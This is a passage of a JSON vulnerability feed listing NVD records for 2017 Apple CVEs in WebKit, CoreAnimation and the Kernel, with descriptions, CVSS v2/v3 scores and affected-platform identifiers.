affected. watchOS before 4.2 is affected. The issue involves the \"CoreAnimation\" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2017-7171", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7171"], "modified": "2019-03-08T16:06:00", "cpe": [], "id": "CVE-2017-7171", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7171", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-03-23T13:24:30", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"Kernel\" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2017-13904", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13904"], "modified": "2019-03-08T16:06:00", "cpe": [], "id": "CVE-2017-13904", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13904", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-03-23T13:24:12", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2017-13885", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13885"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "CVE-2017-13885", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13885", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2022-03-23T13:24:13", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2017-13884", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13884"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "CVE-2017-13884", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13884", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2022-03-23T13:22:51", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-25T21:29:00", "type": "cve", "title": "CVE-2017-13856", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856"], "modified": "2019-03-22T19:19:00", "cpe": ["cpe:/a:apple:webkit:-"], "id": "CVE-2017-13856", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13856", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:webkit:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:23:35", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-25T21:29:00", "type": "cve", "title": "CVE-2017-13870", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13870"], "modified": "2019-03-22T19:20:00", "cpe": ["cpe:/a:apple:webkit:-"], "id": "CVE-2017-13870", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13870", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:webkit:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:23:25", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-25T21:29:00", "type": "cve", "title": "CVE-2017-13866", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13866"], "modified": "2019-03-22T19:19:00", "cpe": ["cpe:/a:apple:webkit:-"], "id": "CVE-2017-13866", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13866", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:webkit:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:33:48", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to spoof user-interface information (about whether the entire content is derived from a valid TLS session) via a crafted web site that sends a 401 Unauthorized redirect.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2017-7153", "cwe": ["CWE-601"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7153"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "CVE-2017-7153", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7153", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2022-03-23T18:33:47", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and applicatio